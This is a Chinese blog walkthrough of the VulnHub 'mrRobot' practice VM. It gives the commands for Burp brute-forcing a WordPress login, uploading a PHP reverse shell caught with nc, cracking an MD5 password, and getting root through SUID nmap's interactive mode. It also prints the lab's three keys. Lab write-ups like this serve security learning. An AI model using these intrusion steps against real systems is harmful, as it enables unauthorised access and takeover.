Vulnhub之mrRobot

最新推荐文章于 2023-06-12 18:09:02 发布
最新推荐文章于 2023-06-12 18:09:02 发布
阅读量456 收藏 2
点赞数 2
分类专栏: VulnHub 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42075643/article/details/115488397
版权

Vulnhub是一个很好的靶机平台,想看官网点这里

今天学习mrRobot,点击这里下载哦~

这个比较简单,入门学习,大佬可以绕过哦…

VMware和VirtualBox都可以导入

成功后如图:
在这里插入图片描述
这里启用NAT模式

攻击机 kali 192.168.81.140
靶机:192.168.81.146
在这里插入图片描述
这个时候继续拿出祖传的nmap神器扫描:

nmap -A 192.168.81.146

在这里插入图片描述
有80、443,直接浏览器访问:
在这里插入图片描述
继续看看有啥有价值的
先用dirsearch扫一下目录:
在这里插入图片描述
通过扫描发现是一个wp博客
有robots文件:
在这里插入图片描述

进去看看:
在这里插入图片描述
得到第一个key:073403c8a58a1f80d943455fb30724b9

看命名,应该是有3个key

还有个字典文件,下载下来

还扫到了wp登录界面:
在这里插入图片描述
利用之前的字典bp爆破一下:

配好代理,拦截包:
在这里插入图片描述

发送到Intruder:
在这里插入图片描述

设置好爆破点
(这里先爆破用户名,两个一起爆破,好家伙,太多了)
导入下载的字典:

在这里插入图片描述
开始(kali自带的bp限制了线程,慢如蜗牛):
在这里插入图片描述
不过用户名靠前,出来了Elliot

接下来爆破密码得到密码

ER28-0652

之后登陆后台:

在这里插入图片描述找到一个上传点:
在这里插入图片描述
直接上传shell:
这里我用的是kali自带的shell,
/usr/share/webshells/php/php-reverse-shell.php
修改监听ip
在这里插入图片描述

然后在media里找到了上传的shell

在这里插入图片描述
打开找到了地址;
在这里插入图片描述

再打开一个窗口监听:

nc -lvp 1234

然后访问:

curl http://192.168.81.146/wp-content/uploads/2021/04/php-reverse-shell1.php

在这里插入图片描述
获得shell:
在这里插入图片描述
是一个普通用户

查看linux内核

在这里插入图片描述
这里没得到提权信息,emmmmm

这里通过python打开bash

python -c 'import pty;pty.spawn("/bin/bash");'

在这里插入图片描述

/home/目录下发现了两个文件,key没有权限,发现一串MD5

c3fcd3d76192e4007dfb496cca67e13b

解密:

robot/abcdefghijklmnopqrstuvwxyz

su robot
密码 abcdefghijklmnopqrstuvwxyz

在这里插入图片描述
(这里我也不知道为啥显示双,密码直接复制进去即可)

在这里插入图片描述
这里得到第二个key

822c73956184f694993bede3eb39f959

完成第二步

继续查看用户信息,是否可以提权

find / -perm -4000 2>/dev/null

在这里插入图片描述
这里看到有nmap,查看版本

nmap -v

在这里插入图片描述

nmap2.02-5.21的版本可以执行命令

nmap --interactive

然后输入!sh

在这里插入图片描述

这里可以看到获得root权限。。
在这里插入图片描述

在root目录下,获得第三个key,至此完成测试。








~~《小白测试》

小菜茑
关注
专栏目录
VulnHub--mrrobot
记录笔记
07-06 890
Vulnhub靶场--Mr robot 靶机
VulnHub-MrRobot靶机渗透记录
Ve99tr’s Blog
04-01 617
MrRobot是一个WEB方向的初学者-中级靶机,一共有三个Key,难度逐级增加,适合学习者了解渗透过程,积累渗透经验
vulnhub靶机-mrRobot
臭nana的博客
05-19 1648
下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 描述: Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn't too difficult. There is
[Vulnhub] mrRobot
weixin_63231007的博客
07-04 383
目录信息搜集wordpress拿shell SUID提权 下载链接:Mr-Robot: 1 ~ VulnHub nmap 192.168.236.0/24扫除靶机ip :192.168.236.135nmap -A 192.168.236.135 开放了22,80,443.但是22端口close 了ssh服务 dirb扫描一下看看,有没有隐藏目录文件或登录入口看见了/login/ 访问之后发现变成了wp-login.php 可以知道这里是wordpress后台管理地址还有 robots.txt 在robo
Vulnhub靶机 MrRobot
菜浪马废的博客
04-14 279
arp-scan -l nmap -sV 192.168.0.143 主页是这个样子的 扫一下网站目录 dirb http://192.168.0.143 发现一个文件 拿到了第一个key 发现后台地址 访问了一下那个文件 拿到一个字典 拿到的字典文件太大 去重复化 重新生成一个字典 sort filename | uniq > filename 登录后台主页 找到...
vulnhub mrRobot渗透笔记
weixin_52268949的博客
03-19 3977
mrRobot渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ kali ip 信息收集 首先依旧时使用nmap扫描靶机的ip地址 nmap -sP 192.168.20.0/24 扫描开放端口 nmap -sV 192.168.20.130 开启了80,443端口我们尝试浏览器访问 尝试使用dirb扫面目录 dirb http://192.168.20.130/ 扫描结果太多我们重点来看如下几个目录 通过扫描发现是一个博
Vulnhub系列-mrRobot
Yasso的博客
12-26 2475
靶机:192.168.12.129 kali: 192.168.12.128 一、信息收集 nmap -sV 192.168.12.129 –扫描开放端口 dirsearch -u http://192.168.12.129/ –扫下web目录 –robots.txt和wordpress登录框– 得到第一个key fsocity.dic打开是个字典,猜测可以用来爆破wordpress登录框 –bp抓包,fsocity当作字典–—80多万。。。。。。— 可以确定用户名是Elliot,那用户名不用爆了(
mrRobot.ova
07-16
SHA256: 1B69E9D8139D27387ED0EED112146FA6277272D1622A789E3CFEFBC456ABFA4F
MrRobot-Logo-Project:重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目
03-06
机器人先生徽标项目 正在进行的工作-随时贡献自己的力量! 重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目 徽标: 免责声明 这是一个由粉丝制作的项目,与任何正式的机器人先生电视节目或美国...
靶场练习第七天~vulnhub靶场之mrRobot
qq_57976347的博客
02-01 1593
靶机下载链接: 百度网盘 请输入提取码 提取码: sqv3 一、主机发现 1.用ifconfig查看kali的ip,因为kali和靶机都开启了NAT模式,使用namp -sP 192.168.101.0/24探测靶机ip 二、信息收集 1.使用nmap扫描靶机 使用nmap -A 192.168.101.108 ,查看靶机开放的端口与服务。 2.使用dirb命令扫描靶机网站 用dirb命令扫描靶机网站,看看有没有隐藏的网址或者配置文件,具体使用方法:dirb http://192.16
Vulnhub项目:MrRobot
Ays.Ie的博客
04-20 583
Vulnhub项目:Mr Robot
vulnhub-MR.Robot (考点 信息搜集/wordpress/nmap提权)
冬萍子癸水
04-22 208
https://www.vulnhub.com/entry/mr-robot-1,151/ nat网络 arp-scan -l 比平常多的ip就是靶机了 就80web,进去花里胡哨。挺有意思的。看着像一顿操作,猛如虎啊。。 不过dirbuster一扫,就原形毕露了。。。 wp是WordPress,就是个WordPress考点,要想到wpscan扫漏洞。等等 不过这次的比较简单, lincense里...
Vulnhub靶场渗透-mrRobot
paidx0
09-21 1012
前言 靶机ip(192.168.110.133) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 漏洞挖掘 扫到的东西比较多,逐个看了一下,在robots.txt里找到第一个 flag,还发现一个字典 其次还找到 Wordpress的登录页 flag1 : 073403c8a58a1f80d943455fb30724b9 可以看看robots.txt里的字典内容,拿这个字典去爆破WordPress登录页 因为需要的时间比较长,就不再跑一边截图了,账号 elli
No.23-VulnHub-Mr-Robot: 1-Walkthrough渗透学习
qq_34801745的博客
01-20 766
** VulnHub-Mr-Robot: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 靶机难度:中级(CTF) 靶机发布日期:2016年6月28日 靶机描述:根据表演,机器人先生。 此VM具有隐藏在不同位置的三个键。您的目标是找到全部三个。每个密钥逐渐难以找到。 VM不太困难。没有任何高级开发或逆向工程。该...
VulnhHub | Mr-Robot:1
薛定的餓貓
12-04 570
目录Mr.Robot项目地址测试环境信息收集暴力破解上传Web Shell生成TTY Shell提权Game Over Mr.Robot 最近在看黑客军团(Mr.Robot),其实说实话我觉得这片还是有点像心理犯罪片,以前看的时候有点看不懂在干啥(也可能智商问题),在逛vulnhub的时候又刚好看到有个以这个命名的靶机,就下载下来玩玩了。 项目地址 http://www.vulnhub.com/entry/mr-robot-1,151/ 难度:Low-Medium 测试环境 攻击机:Parrot 192.1
Mrrobot靶机渗透实战-vuluhub系列(六)
PANDA墨森的博客
07-04 620
这是vulnhub靶机系列文章的第六篇,本次主要知识点为:wordpress后台编辑模板getshell,suid提权-nmap命令,话不多说,直接开始吧... 靶机下载地址: https://www.vulnhub.com/entry/mr-robot-1,151/ #001 实验环境(nat模式) 攻击机:kali:192.168.136.129 靶机mrrobot:192.168.136.138 #002 实战writeup 寻找靶机ip,查找网卡中存活的主机,找到靶机ip:19...
靶机渗透——Mr.Robot
1匹黑马
02-22 1587
文章目录任务环境信息收集漏洞挖掘漏洞利用权限获取权限提升 任务环境 攻击机:Kali2019 靶机:Mr.Robot 涉及知识点:暴力破解、WP404页面插马、nmap提权 信息收集 查一下靶机的IP与=以及开放的端口及内核版本 开放了22、80、443端口,我们去扫一下Web目录 我们用curl查看一下 这里给了一个字典和第一个key 漏洞挖掘 我们访问一下它的后台,这里要求我们输...
vulhub - Mr. Robot 1 writeup
Jiajiajiang_的博客
04-04 1368
主机来源:www.vulnhub.com 下载链接:https://download.vulnhub.com/mrrobot/mrRobot.ova 准备工作 下载.ova文件,直接双击即可安装成功。 设置连接方式为NAT,攻击机器使用kali,也设置为NAT。 发现IP 刚安装的虚拟机并不知道IP地址,使用netdiscover发现IP。 root@kali:~# net...
mrRobot-1靶场_wp
最新发布
shajianlong666的博客
06-12 368
简单的一次靶场练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值